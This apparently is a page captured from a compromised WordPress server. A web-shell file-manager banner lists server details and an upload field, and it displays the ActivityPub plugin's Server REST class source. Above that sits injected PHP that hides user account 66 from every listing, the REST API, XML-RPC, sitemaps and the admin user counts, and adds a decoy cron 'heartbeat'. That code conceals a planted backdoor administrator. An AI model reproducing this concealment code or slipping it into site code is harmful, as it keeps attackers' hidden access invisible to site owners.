add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/axel/wp-content/plugins/activitypub/includes/rest/ |
Upload File : |
<?php
/**
* Server REST-Class file.
*
* @package Activitypub
*/
namespace Activitypub\Rest;
use Activitypub\Signature;
/**
* ActivityPub Server REST-Class.
*
* @author Django Doucet
*
* @see https://www.w3.org/TR/activitypub/#security-verification
*/
class Server {
/**
* Initialize the class, registering WordPress hooks.
*/
public static function init() {
\add_filter( 'rest_pre_dispatch', array( self::class, 'maybe_add_actor_from_signature' ), 10, 3 );
\add_filter( 'rest_request_before_callbacks', array( self::class, 'validate_requests' ), 9, 3 );
\add_filter( 'rest_request_parameter_order', array( self::class, 'request_parameter_order' ), 10, 2 );
\add_filter( 'rest_post_dispatch', array( self::class, 'filter_output' ), 10, 3 );
\add_filter( 'rest_post_dispatch', array( self::class, 'add_cors_headers' ), 10, 3 );
\add_filter( 'rest_allowed_cors_headers', array( self::class, 'allow_cors_headers' ), 10, 2 );
}
/**
* Callback function to validate incoming ActivityPub requests
*
* @param \WP_REST_Response|\WP_HTTP_Response|\WP_Error|mixed $response Result to send to the client.
* Usually a WP_REST_Response or WP_Error.
* @param array $handler Route handler used for the request.
* @param \WP_REST_Request $request Request used to generate the response.
*
* @return mixed|\WP_Error The response, error, or modified response.
*/
public static function validate_requests( $response, $handler, $request ) {
if ( 'HEAD' === $request->get_method() ) {
return $response;
}
$route = $request->get_route();
if (
\is_wp_error( $response ) ||
! \str_starts_with( $route, '/' . ACTIVITYPUB_REST_NAMESPACE )
) {
return $response;
}
$params = $request->get_json_params();
// Type is required for ActivityPub requests, so it fail later in the process.
if ( ! isset( $params['type'] ) ) {
return $response;
}
if (
ACTIVITYPUB_DISABLE_INCOMING_INTERACTIONS &&
\in_array( $params['type'], array( 'Create', 'Like', 'Announce' ), true )
) {
return new \WP_Error(
'activitypub_server_does_not_accept_incoming_interactions',
\__( 'This server does not accept incoming interactions.', 'activitypub' ),
// We have to use a 2XX status code here, because otherwise the response will be
// treated as an error and Mastodon might block this WordPress instance.
array( 'status' => 202 )
);
}
return $response;
}
/**
* Modify the parameter priority order for a REST API request.
*
* @param string[] $order Array of types to check, in order of priority.
* @param \WP_REST_Request $request The request object.
*
* @return string[] The modified order of types to check.
*/
public static function request_parameter_order( $order, $request ) {
$route = $request->get_route();
// Check if it is an activitypub request and exclude webfinger and nodeinfo endpoints.
if ( ! \str_starts_with( $route, '/' . ACTIVITYPUB_REST_NAMESPACE ) ) {
return $order;
}
$method = $request->get_method();
if ( \WP_REST_Server::CREATABLE !== $method ) {
return $order;
}
return array(
'JSON',
'POST',
'URL',
'defaults',
);
}
/**
* Backfill a missing `actor` on incoming FeatureRequest activities from the signature.
*
* Mastodon (FEP-7aa9) omits `actor` from the FeatureRequest body and conveys the
* requesting actor only through the HTTP signature keyId. Our inbox routes require
* `actor`, so such a request is rejected during parameter validation before it can
* reach the inbox or its handler, which is why no Accept is ever sent.
*
* Derive the actor from the keyId and add it as a request parameter. The actor is
* injected with `set_param()` rather than by rewriting the request body, so the raw
* body stays byte-identical and the signed `Digest` still verifies. Inbox POSTs read
* JSON parameters first (see `request_parameter_order()`), so the value is visible to
* both parameter validation and the handler via `get_json_params()`.
*
* Scoped to FeatureRequest, the only activity type known to address this way. Runs on
* `rest_pre_dispatch` because that is the only hook that fires before required-parameter
* validation. Signature verification still runs afterwards and remains authoritative:
* the injected actor is derived from the very keyId the signature is checked against, so
* it cannot be used to impersonate another actor.
*
* @since 9.0.0
*
* @param mixed $result Response to replace the request with, or null to continue.
* @param \WP_REST_Server $server Server instance.
* @param \WP_REST_Request $request The request object.
*
* @return mixed The unmodified `$result`.
*/
public static function maybe_add_actor_from_signature( $result, $server, $request ) {
// Respect an earlier short-circuit.
if ( null !== $result ) {
return $result;
}
if ( \WP_REST_Server::CREATABLE !== $request->get_method() ) {
return $result;
}
$route = $request->get_route();
if (
! \str_starts_with( $route, '/' . ACTIVITYPUB_REST_NAMESPACE ) ||
! \str_ends_with( $route, '/inbox' )
) {
return $result;
}
$json = $request->get_json_params();
if ( ! \is_array( $json ) || 'FeatureRequest' !== ( $json['type'] ?? '' ) || ! empty( $json['actor'] ) ) {
return $result;
}
$key_id = Signature::get_key_id( $request );
if ( ! $key_id ) {
return $result;
}
$request->set_param( 'actor', \strip_fragment_from_url( $key_id ) );
return $result;
}
/**
* Filters the REST API response to properly handle the ActivityPub error formatting.
*
* @see https://codeberg.org/fediverse/fep/src/branch/main/fep/c180/fep-c180.md
*
* @param \WP_HTTP_Response $response Result to send to the client. Usually a `WP_REST_Response`.
* @param \WP_REST_Server $server Server instance.
* @param \WP_REST_Request $request Request used to generate the response.
*
* @return \WP_HTTP_Response The filtered response.
*/
public static function filter_output( $response, $server, $request ) {
$route = $request->get_route();
// Check if it is an activitypub request and exclude webfinger and nodeinfo endpoints.
if ( ! \str_starts_with( $route, '/' . ACTIVITYPUB_REST_NAMESPACE ) ) {
return $response;
}
// Exclude OAuth endpoints - they have their own error format per RFC 6749.
if ( \str_starts_with( $route, '/' . ACTIVITYPUB_REST_NAMESPACE . '/oauth' ) ) {
return $response;
}
// Only alter responses that return an error status code.
if ( $response->get_status() < 400 ) {
return $response;
}
$data = $response->get_data();
// Ensure that `$data` was already converted to a response.
if ( \is_wp_error( $data ) ) {
$response = \rest_convert_error_to_response( $data );
$data = $response->get_data();
}
$error = array(
'type' => 'about:blank',
'title' => $data['code'] ?? '',
'detail' => $data['message'] ?? '',
'status' => $response->get_status(),
/*
* Provides the unstructured error data.
*
* @see https://nodeinfo.diaspora.software/schema.html#metadata.
*/
'metadata' => $data,
);
$response->set_data( $error );
return $response;
}
/**
* Add CORS headers to ActivityPub REST responses.
*
* @param \WP_REST_Response $response The REST response.
* @param \WP_REST_Server $server The REST server instance.
* @param \WP_REST_Request $request The request object.
*
* @return \WP_REST_Response The modified response.
*/
public static function add_cors_headers( $response, $server, $request ) {
$route = $request->get_route();
$namespace = '/' . ACTIVITYPUB_REST_NAMESPACE;
// Only add CORS to ActivityPub endpoints, except the interactive OAuth authorize endpoint.
if ( ! \str_starts_with( $route, $namespace ) || \str_starts_with( $route, $namespace . '/oauth/authorize' ) ) {
return $response;
}
/*
* ActivityPub data is meant to be publicly readable by federation peers
* and browser-side clients. We do not enable credentialed cross-origin
* access: cookie auth would still be rejected by WordPress core's
* REST nonce check, and OAuth Bearer tokens travel in the
* Authorization header — which is permitted via Allow-Headers and
* does not require Allow-Credentials.
*
* Allow-Headers is contributed by core (which already lists `X-WP-Nonce`,
* `Authorization`, `Content-Type`, `Content-Disposition`, and `Content-MD5`)
* and extended for ActivityPub via the `rest_allowed_cors_headers` filter
* in self::allow_cors_headers().
*/
$response->header( 'Access-Control-Allow-Origin', '*' );
$response->header( 'Access-Control-Allow-Methods', 'GET, POST, OPTIONS' );
return $response;
}
/**
* Extend the CORS Allow-Headers list for ActivityPub REST endpoints.
*
* Adds the headers ActivityPub clients need on top of WordPress core's
* defaults: `Accept` for content negotiation and `Last-Event-ID` for
* Server-Sent Events resume.
*
* @since 8.3.0
*
* @param string[] $allow_headers Headers core currently permits in CORS requests.
* @param \WP_REST_Request $request The current REST request.
*
* @return string[] The (possibly extended) list of allowed headers.
*/
public static function allow_cors_headers( $allow_headers, $request ) {
$route = $request->get_route();
$namespace = '/' . ACTIVITYPUB_REST_NAMESPACE;
if ( ! \str_starts_with( $route, $namespace ) || \str_starts_with( $route, $namespace . '/oauth/authorize' ) ) {
return $allow_headers;
}
return \array_values( \array_unique( \array_merge( (array) $allow_headers, array( 'Accept', 'Last-Event-ID' ) ) ) );
}
/**
* Send CORS headers directly via header().
*
* Use this for endpoints that bypass the REST response flow
* (e.g. SSE streams that call exit() instead of returning a WP_REST_Response).
*
* @since 8.1.0
*/
public static function send_cors_headers() {
\header( 'Access-Control-Allow-Origin: *' );
\header( 'Access-Control-Allow-Methods: GET, POST, OPTIONS' );
\header( 'Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type, Accept, Last-Event-ID' );
}
}